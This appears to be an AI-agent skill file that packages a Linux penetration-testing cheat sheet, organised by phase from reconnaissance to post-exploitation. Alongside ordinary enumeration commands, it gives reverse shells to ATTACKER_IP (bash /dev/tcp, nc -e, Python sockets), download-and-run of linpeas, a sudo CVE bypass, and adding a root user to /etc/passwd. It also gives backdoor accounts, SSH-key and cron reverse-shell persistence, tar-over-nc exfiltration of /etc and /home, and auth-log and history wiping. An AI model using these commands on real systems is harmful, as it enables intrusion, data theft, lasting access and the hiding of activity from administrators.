Practical Linux command reference and penetration testing notes for reconnaissance, enumeration, exploitation, privilege escalation, and post-exploitation phases
---
name: linux-pentester-command-reference
description: Practical Linux command reference for penetration testing reconnaissance, enumeration, exploitation, privilege escalation, and post-exploitation.
triggers:
- "show me pentesting commands for reconnaissance"
- "how do I enumerate services on Linux"
- "what are common privilege escalation techniques"
- "give me Linux post-exploitation commands"
- "show me pentesting command cheatsheet"
- "how to do local enumeration on Linux"
- "what commands for exploitation on Linux systems"
- "help with Linux privilege escalation"
---
# Linux Pentester Command Reference
> Skill by [ara.so](https://ara.so) — Security Skills collection.
## Overview
The **Linux for a Pentester** repository is a comprehensive command reference for penetration testers working with Linux systems. It provides practical, real-world commands organized by penetration testing phases: reconnaissance, enumeration, exploitation, privilege escalation, and post-exploitation. This is a knowledge base, not a tool to install—use it as a reference guide during security assessments.
## Repository Structure
The repository is organized into modules by testing phase:
- **00-General-Commands**: Essential Linux survival commands
- **01-Recon**: Local and network reconnaissance
- **02-Enumeration**: Service and user data enumeration
- **03-Exploitation**: Initial access techniques
- **04-Privilege-Escalation**: Privilege escalation methods
- **05-Post-Exploitation**: Persistence and lateral movement
- **Cheatsheets**: Quick reference one-liners
## Installation
This is a reference repository—clone it for offline access:
```bash
git clone https://github.com/HIMANSHUSHARMA20/Linux-for-a-Pentester.git
cd Linux-for-a-Pentester
```
No additional installation required. Navigate directories for specific command references.
## Key Command Categories
### General Commands (Survival Kit)
Essential commands for basic system navigation and file operations:
```bash
# File operations
ls -la # List all files with permissions
cat /etc/passwd # View user accounts
find / -name "*.conf" 2>/dev/null # Find config files
grep -r "password" /var/www/ # Search for sensitive strings
# System information
uname -a # Kernel and system info
whoami # Current user
id # User and group IDs
hostname # System hostname
```
### Reconnaissance Commands
Local system reconnaissance:
```bash
# User enumeration
cat /etc/passwd # List all users
cat /etc/group # List all groups
w # Who is logged in
lastlog # Last login information
history # Command history
# Network reconnaissance
ifconfig -a # Network interfaces
ip addr show # IP addresses (modern)
ip route # Routing table
ss -tulpn # Active network connections
netstat -tulpn # Active connections (legacy)
arp -a # ARP cache
# Process enumeration
ps aux # All running processes
ps -ef --forest # Process tree
top # Interactive process viewer
```
### Enumeration Commands
Deep service and configuration enumeration:
```bash
# Service enumeration
systemctl list-units --type=service # Systemd services
service --status-all # SysV services
chkconfig --list # Service autostart config
# File permission enumeration
find / -perm -4000 2>/dev/null # SUID binaries
find / -perm -2000 2>/dev/null # SGID binaries
find / -writable -type f 2>/dev/null # Writable files
# Cron job enumeration
cat /etc/crontab
ls -la /etc/cron.*
crontab -l # User cron jobs
# Capability enumeration
getcap -r / 2>/dev/null
# Mounted filesystems
mount # Show mounted filesystems
cat /etc/fstab # Filesystem mount config
df -h # Disk usage
```
### Exploitation Commands
Common exploitation techniques:
```bash
# Reverse shells
bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1
nc -e /bin/bash ATTACKER_IP 4444
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("ATTACKER_IP",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/sh","-i"]);'
# Shell upgrading
python -c 'import pty; pty.spawn("/bin/bash")'
export TERM=xterm
# Press Ctrl+Z
stty raw -echo; fg
# Press Enter twice
# File transfer
# On attacker
python3 -m http.server 8000
nc -lvnp 4444 > received_file
# On target
wget http://ATTACKER_IP:8000/file
curl http://ATTACKER_IP:8000/file -o file
nc ATTACKER_IP 4444 < file_to_send
```
### Privilege Escalation Commands
Common privilege escalation vectors:
```bash
# Automated enumeration
# Download and run linpeas.sh
wget http://ATTACKER_IP/linpeas.sh
chmod +x linpeas.sh
./linpeas.sh
# Manual SUID exploitation
find / -perm -4000 2>/dev/null
# Check GTFOBins for SUID binary exploits
# Sudo exploitation
sudo -l # List sudo privileges
sudo -u#-1 /bin/bash # CVE-2019-14287 (if sudo < 1.8.28)
# Capabilities exploitation
getcap -r / 2>/dev/null
# Example: python with cap_setuid
/usr/bin/python -c 'import os; os.setuid(0); os.system("/bin/bash")'
# Kernel exploits
uname -a # Check kernel version
searchsploit "Linux Kernel 4.4" # Search for exploits
# Writable /etc/passwd
openssl passwd -1 -salt xyz password123
echo 'newroot:$1$xyz$...:0:0:root:/root:/bin/bash' >> /etc/passwd
# Path hijacking
echo $PATH
export PATH=/tmp:$PATH
# Create malicious binary in /tmp
```
### Post-Exploitation Commands
Persistence and lateral movement:
```bash
# SSH key persistence
mkdir -p ~/.ssh
echo "ATTACKER_PUBLIC_KEY" >> ~/.ssh/authorized_keys
chmod 600 ~/.ssh/authorized_keys
# User creation
useradd -m -s /bin/bash backdoor
echo "backdoor:password" | chpasswd
usermod -aG sudo backdoor
# Cron persistence
echo "* * * * * /bin/bash -c 'bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1'" | crontab -
# Data exfiltration
tar czf - /etc /home | nc ATTACKER_IP 5555
find / -name "*.db" -o -name "*.sql" 2>/dev/null
# Log cleanup
echo "" > /var/log/auth.log
history -c
rm ~/.bash_history
ln -sf /dev/null ~/.bash_history
```
## Common Patterns
### Full Enumeration Workflow
```bash
# 1. System information
uname -a
cat /etc/*-release
hostname
id
# 2. User enumeration
cat /etc/passwd
ls -la /home/
# 3. Network enumeration
ip addr
ss -tulpn
cat /etc/hosts
# 4. Service enumeration
ps aux
systemctl list-units --type=service
# 5. File permission checks
find / -perm -4000 2>/dev/null
find / -writable -type f 2>/dev/null
# 6. Scheduled tasks
cat /etc/crontab
crontab -l
# 7. Sudo rights
sudo -l
```
### Quick Privilege Escalation Check
```bash
# One-liner privilege escalation check
(sudo -l; find / -perm -4000 2>/dev/null; getcap -r / 2>/dev/null; cat /etc/crontab; ls -la /etc/cron.*; cat /etc/passwd | grep -v "nologin")
```
## Troubleshooting
### Command Not Found
Some commands may not be available on minimal systems:
```bash
# If netstat not available, use ss
ss -tulpn
# If ifconfig not available, use ip
ip addr show
# If wget not available, use curl
curl -O http://example.com/file
```
### Permission Denied
```bash
# Redirect stderr to hide permission errors
find / -name "*.conf" 2>/dev/null
# Use sudo if available
sudo find / -name "*.conf"
```
### Limited Shell Issues
```bash
# If no tab completion or arrow keys
python -c 'import pty; pty.spawn("/bin/bash")'
export TERM=xterm
# If terminal size wrong
stty rows 50 cols 200
```
## Best Practices
1. **Always redirect errors**: Use `2>/dev/null` to avoid cluttering output
2. **Check sudo privileges first**: `sudo -l` often reveals quick wins
3. **Enumerate writable directories**: `/tmp`, `/dev/shm` for staging exploits
4. **Document findings**: Keep notes of enumeration results
5. **Clean up artifacts**: Remove uploaded tools and created files
6. **Use environment variables**: Store attacker IP as `$ATTACKER_IP` for reusable commands
## Integration with Testing Tools
```bash
# Export enumeration data
ps aux > processes.txt
ss -tulpn > ports.txt
find / -perm -4000 2>/dev/null > suid.txt
# Parse with common tools
cat /etc/passwd | cut -d: -f1,3,6 | grep -v "nologin"
```
## Reference
For detailed command explanations, navigate to specific module directories in the cloned repository. Each module contains markdown files with comprehensive notes and examples.
Creator's repository · aradotso/security-skills